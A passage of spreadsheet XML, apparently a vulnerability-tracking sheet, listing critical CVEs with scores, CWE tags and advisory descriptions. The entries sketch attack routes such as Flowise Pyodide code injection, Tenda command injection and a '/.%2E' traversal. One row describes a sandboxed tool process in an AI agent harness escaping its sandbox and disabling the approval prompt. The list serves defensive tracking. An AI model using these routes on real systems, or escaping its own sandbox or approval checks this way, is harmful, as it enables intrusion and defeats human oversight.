      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69264</t>
        </is>
      </c>
      <c r="C387" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D387" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E387" s="5" t="inlineStr"/>
      <c r="F387" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G387" s="5" t="inlineStr">
        <is>
          <t>java, node.js, python</t>
        </is>
      </c>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L387" s="5" t="inlineStr">
        <is>
          <t>Prior to 3.1.3, Flowise CSVAgent interpolates an attacker-controlled segment of the csvFile data URI directly into a Python source-code template that is then executed by Pyodide. Because Pyodide is loaded with the default js bridge to globalThis, which on Node.js exposes eval and dynamic import, the attacker can break out of the Python string literal, hand a JavaScript string to js.eval, dynamically import Node built-in modules such as fs and child_process, and execute arbitrary file I/O or OS commands as the Flowise process. The two validator paths around this code, validatePythonCodeForDataFrame and validateCustomReadCSVFunction, are never applied to the bootstrap template. A workspace user with chatflows:create or agentflows/chatflows update permission can plant a CSV Agent node with a crafted csvFile; once the chatflow is exposed via POST /api/v1/prediction/:id, any unauthenticated request triggers host remote code execution. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69264</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72841</t>
        </is>
      </c>
      <c r="C388" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D388" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E388" s="5" t="inlineStr"/>
      <c r="F388" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L388" s="5" t="inlineStr">
        <is>
          <t>luci-app-openvpn fails to properly validate the instance_name2 parameter during file upload, allowing authenticated users to perform path traversal and write arbitrary files outside the intended directory. Attackers can upload malicious payloads to gain persistent root code execution by placing SSH keys in system directories accessible on reboot.</t>
        </is>
      </c>
      <c r="M388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72841</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72842</t>
        </is>
      </c>
      <c r="C389" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D389" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E389" s="5" t="inlineStr"/>
      <c r="F389" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L389" s="5" t="inlineStr">
        <is>
          <t>luci-app-lxc contains an ACL inconsistency vulnerability that allows low-privileged authenticated LuCI users to access backend container management routes without proper authorization checks. Attackers can exploit path traversal via `/.%2E` in the `lxc_name` parameter to escape container directories and control host-side scripts executed through `lxc.hook.start-host`, achieving root code execution on the OpenWrt host.</t>
        </is>
      </c>
      <c r="M389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72842</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72879</t>
        </is>
      </c>
      <c r="C390" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D390" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E390" s="5" t="inlineStr"/>
      <c r="F390" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G390" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.8, the getRegistryCommands() function in packages/server/src/utils/cluster/upload.ts interpolates registry.password and registry.registryUrl directly into a shell command without escaping. An authenticated user with project access can configure malicious registry credentials and trigger a swarm deployment to execute arbitrary OS commands on the Dokploy server, read or modify host files, and access other containers through Docker. This issue is fixed in version 0.29.8.</t>
        </is>
      </c>
      <c r="M390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72879</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73653</t>
        </is>
      </c>
      <c r="C391" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D391" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E391" s="5" t="inlineStr"/>
      <c r="F391" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-552, CWE-862</t>
        </is>
      </c>
      <c r="L391" s="5" t="inlineStr">
        <is>
          <t>Vitest is a testing framework powered by Vite. Prior to versions 3.2.7, 4.1.10, and 5.0.0-beta.6, Browser Mode provider commands including upload, takeScreenshot, screenshotMatcher, stopChunkTrace, deleteTracing, and annotateTraces accept browser-supplied file paths without enforcing the allowWrite permission gate or confining paths to the project root. A client that can reach the Browser Mode API can read arbitrary local files, create or overwrite image and trace files, or delete files accessible to the Vitest process even when allowWrite is false. This issue is fixed in versions 3.2.7, 4.1.10, and 5.0.0-beta.6.</t>
        </is>
      </c>
      <c r="M391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73653</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75925</t>
        </is>
      </c>
      <c r="C392" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D392" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E392" s="5" t="inlineStr"/>
      <c r="F392" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of CRLF sequences in IXON VPN Client before version 1.4.7 allows an attacker to execute commands as root or SYSTEM. Configuration values accepted by the local service are written to a file later consumed by a privileged subprocess, without line-ending sequences being neutralized, which allows additional directives to be introduced into that file. The configuration interface accepts changes without authenticating or verifying the origin of the requester. The injected configuration persists on disk across restarts of the client and the operating system, and the VPN connection continues to function normally, so there is no behavioral change visible to the user.</t>
        </is>
      </c>
      <c r="M392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75925</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="C393" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D393" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E393" s="5" t="inlineStr"/>
      <c r="F393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G393" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L393" s="5" t="inlineStr">
        <is>
          <t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t>
        </is>
      </c>
      <c r="M393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81046</t>
        </is>
      </c>
      <c r="C394" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D394" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E394" s="5" t="inlineStr"/>
      <c r="F394" s="5" t="inlineStr"/>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L394" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Protection Mechanism Failure vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Arbitrary Code Execution within the application context.</t>
        </is>
      </c>
      <c r="M394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81046</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82533</t>
        </is>
      </c>
      <c r="C395" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D395" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E395" s="5" t="inlineStr"/>
      <c r="F395" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L395" s="5" t="inlineStr">
        <is>
          <t>DeepSeek Harness before 0.1.2-alpha.1 contains an authentication bypass vulnerability that grants unauthenticated access to its local HTTP agent-control API by accepting a client-supplied loopback Host header in place of validating the actual TCP connection origin. On the default configuration, a confined tool-executed process can reach the loopback API without any port exposure and use it to escape its own OS sandbox, escalate to unconfined execution, and disable the approval prompt. When the port is externally reachable via tunnel, SSH forward, or reverse proxy, a remote attacker can exploit the same flaw to create sessions, execute arbitrary commands, and exfiltrate stored conversation transcripts without credentials.</t>
        </is>
      </c>
      <c r="M395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84200</t>
        </is>
      </c>
      <c r="C396" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D396" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E396" s="5" t="inlineStr"/>
      <c r="F396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L396" s="5" t="inlineStr">
        <is>
          <t>Kyverno versions v1.9.0 through v1.12.7 contain a policy exception handling flaw. When a policy in enforce mode is combined with two PolicyExceptions, the less restrictive exception takes precedence, allowing an attacker to bypass the policy by crafting a resource name that matches the second exception's name pattern (e.g., '*ingress*'). This can be used to circumvent policies such as one blocking hostPath volumes. Fixed in v1.13.0.</t>
        </is>
      </c>
      <c r="M396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84200</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86123</t>
        </is>
      </c>
      <c r="C397" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D397" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E397" s="5" t="inlineStr"/>
      <c r="F397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L397" s="5" t="inlineStr">
        <is>
          <t>SQL Chat contains four unauthenticated API endpoints that accept client-supplied database connection parameters and execute arbitrary SQL queries against attacker-specified hosts. Attackers can connect to internal databases, execute SQL commands, enumerate schemas, and pivot into the server's network without authentication.</t>
        </is>
      </c>
      <c r="M397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86123</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86148</t>
        </is>
      </c>
      <c r="C398" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D398" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E398" s="5" t="inlineStr"/>
      <c r="F398" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Tenda CP3 27.5.57.101. This vulnerability affects the function SystemAsh of the file Apis/system.c of the component Kylin. The manipulation of the argument AlarmVoiceURL results in os command injection. It is possible to launch the attack remotely.</t>
        </is>
      </c>
      <c r="M398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86148</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86149</t>
        </is>
      </c>
      <c r="C399" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D399" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E399" s="5" t="inlineStr"/>
      <c r="F399" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Tenda CP3 27.5.57.101. This issue affects some unknown processing of the file Net/NetCheckPing.cpp. This manipulation of the argument interface_name/host causes os command injection. The attack can be initiated remotely.</t>
        </is>
      </c>
      <c r="M399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86149</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86151</t>
        </is>
      </c>
      <c r="C400" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D400" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E400" s="5" t="inlineStr"/>
      <c r="F400" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Tenda CP3 27.5.57.101. The affected element is the function sub_2F77E8 of the file Apis/system.c of the component Network Configuration Management. Performing a manipulation results in os command injection. The attack may be initiated remotely.</t>
        </is>
      </c>
      <c r="M400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86151</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86153</t>
        </is>
      </c>
      <c r="C401" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D401" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E401" s="5" t="inlineStr"/>
      <c r="F401" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Tenda CP3 27.5.57.101. This affects the function CRedirServer::SetRedirectEnable of the file Functions/Redirect.cpp. The manipulation leads to improper privilege management. Remote exploitation of the attack is possible.</t>
        </is>
      </c>
      <c r="M401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86153</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88285</t>
        </is>
      </c>
      <c r="C402" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D402" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E402" s="5" t="inlineStr"/>
      <c r="F402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 exposes a network-accessible PTZ control service without authentication, allowing remote clients to retrieve PTZ information and issue PTZ or raw serial commands.</t>
        </is>
      </c>
      <c r="M402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88285</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54356</t>
        </is>
      </c>
      <c r="C403" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D403" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E403" s="5" t="inlineStr"/>
      <c r="F403" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>CWE-326</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr">
        <is>
          <t>Kyverno versions 1.9.4 and earlier support insecure 3DES cipher suites (TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA and TLS_RSA_WITH_3DES_EDE_CBC_SHA) on their TLS endpoints. These 64-bit block ciphers are vulnerable to the Sweet32 attack (CVE-2016-2183), which, over very long-lived TLS connections carrying large volumes of traffic, could allow an attacker to recover small amounts of plaintext. The issue is fixed in Kyverno 1.9.5 and 1.10.0.</t>
        </is>
      </c>
      <c r="M403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54356</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54391</t>
        </is>
      </c>
      <c r="C404" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D404" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E404" s="5" t="inlineStr"/>
      <c r="F404" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="L404" s="5" t="inlineStr">
        <is>
          <t>Proxmox Virtual Environment (VE) 7.0 through 8.0 contains an authentication bypass vulnerability in libpve-access-control before 8.0.4 that allows unauthenticated attackers to authenticate as any existing enabled user without a configured second factor by supplying an arbitrary tfa-challenge value in the API login endpoint. Attackers can send a POST request to the access ticket API endpoint with any value in the tfa-challenge parameter to completely skip password verification, gaining unauthorized access including to the root@pam account. All affected releases are end of life.</t>
        </is>
      </c>
      <c r="M404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54391</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58376</t>
        </is>
      </c>
      <c r="C405" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D405" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E405" s="5" t="inlineStr"/>
      <c r="F405" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L405" s="5" t="inlineStr">
        <is>
          <t>Renovate versions 37.158.0 before 37.199.0 contain a command injection vulnerability in the helmv3 manager's registryAliases handling that allows attackers with commit access to execute arbitrary commands. Attackers can manipulate registryAliases keys with unquoted shell metacharacters to inject commands executed during helm repo add operations, gaining full access to Renovate's execution environment.</t>
        </is>
      </c>
      <c r="M405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58376</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14813</t>
        </is>
      </c>
      <c r="C406" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D406" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E406" s="5" t="inlineStr"/>
      <c r="F406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G406" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L406" s="5" t="inlineStr">
        <is>
          <t>: Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (core modules).
 This vulnerability is associated with program files G3413CTRBlockCipher.
This issue affects BC-JAVA: from 1.59 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14813</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-31114</t>
        </is>
      </c>
      <c r="C407" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D407" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E407" s="5" t="inlineStr"/>
      <c r="F407" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L407" s="5" t="inlineStr">
        <is>
          <t>Fooocus is an image generating software. In versions 2.5.5 and prior, the Fooocus web UI is vulnerable to remote code execution due to the unsafe use of eval when processing metadata JSON. An attacker with access to the Fooocus web UI may be able to execute arbitrary code on the instance. As of time of publication, no known patched versions are available, but a suggested fix pull request is available.</t>
        </is>
      </c>
      <c r="M407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-31114</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71401</t>
        </is>
      </c>
      <c r="C408" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D408" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E408" s="5" t="inlineStr"/>
      <c r="F408" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
